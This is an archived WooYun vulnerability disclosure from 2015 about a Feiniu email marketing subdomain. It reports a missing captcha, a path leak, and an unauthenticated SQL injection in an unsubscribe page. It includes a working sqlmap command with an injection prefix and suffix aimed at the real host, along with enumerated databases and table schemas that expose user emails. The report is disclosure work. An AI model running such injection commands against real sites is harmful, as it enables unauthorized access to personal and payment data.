当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130577

漏洞标题:飞牛网某业务站点漏洞打包(涉及邮件、支付等信息)

相关厂商:飞牛网

漏洞作者: 路人甲

提交时间:2015-07-31 10:32

修复时间:2015-09-14 15:12

公开时间:2015-09-14 15:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-31: 细节已通知厂商并且等待厂商处理中
2015-07-31: 厂商已经确认,细节仅向厂商公开
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开

简要描述:

经常去大润发购物看到飞牛网广告,发现是乌云厂商,友情测试一下。

详细说明:

问题1:无验证码,存在撞裤风险

http://fms.feiniu.com/login.php


问题2:泄漏物理路径

http://fms.feiniu.com/mail.php


13.png


问题3:未授权访问导致的sql注入(update注入)

http://fms.feiniu.com/unsubscribe.php


页面为邮件退订功能,ref和uid参数存在sql注入
下面两次请求可以验证注入存在

15.png


16.png


判断mysql版本号为5

14.png


17.png


丢到sqlmap

c:\Python27\sqlmap>sqlmap.py -u "http://fms.feiniu.com/unsubscribe.php" --data="
ref=&uid=&RadioGroup1=%E5%86%85%E5%AE%B9%E4%B8%8D%E5%90%B8%E5%BC%95%E6%88%91&txt
Reason=&submit=" -p ref --prefix "'%2b(if((1=1" --suffix "),1,(select 1 union se
lect 2)))%2b'" --dbs


数据库:

back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] edm
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


edm库的表居然有694张。。。

11.png


查了一下csu_list表的列名:

Table: csu_list
[16 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| add_time | datetime |
| content_id | int(5) |
| end_time | datetime |
| id | int(11) |
| mail_u | int(2) |
| mailer | varchar(64) |
| mailserver_id | int(11) |
| mg_report | int(2) |
| report_status | int(2) |
| sc_db | bigint(13) |
| sc_name | varchar(64) |
| send_status | int(2) |
| start_time | datetime |
| status | int(2) |
| timing | datetime |
| title | varchar(64) |
+---------------+-------------+


从列名可以看出来,这张表存储的是邮件信息。
查了一下1414a_10w表的列名:

Table: 1414a_10w
[9 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| local | varchar(64) |
| email | varchar(250) |
| id | int(10) |
| mail_status | int(2) |
| mem_tag | int(2) |
| pay_time_end | datetime |
| pay_time_start | datetime |
| reg_time | datetime |
| status | int(2) |
+----------------+--------------+


根据pay_time_start等列名推测涉及支付信息。
获取一下此表中email的数量:

18.png


此表有10w用户数量。

漏洞证明:

如上所述:泄漏用户信息,邮件内容,支付信息。

修复方案:

重点修复问题1和问题3

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-31 15:12

厂商回复:

感谢对飞牛安全的关注,我们及时通知相关人员进行修复!

最新状态:

暂无